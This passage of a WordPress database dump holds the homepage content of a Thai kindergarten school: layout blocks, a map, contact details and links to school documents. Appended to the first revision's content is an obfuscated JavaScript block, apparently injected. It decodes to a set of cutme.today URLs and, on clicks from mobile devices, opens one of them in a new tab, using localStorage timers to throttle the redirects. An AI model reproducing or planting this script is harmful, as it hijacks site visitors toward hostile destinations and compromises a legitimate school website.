-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-28 10:05:27','2024-08-28 03:05:27','',19,'http://watprato.ssk.in.th/?p=241',0,'revision','',0),
(242,2,'2024-08-28 10:17:49','2024-08-28 03:17:49','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" 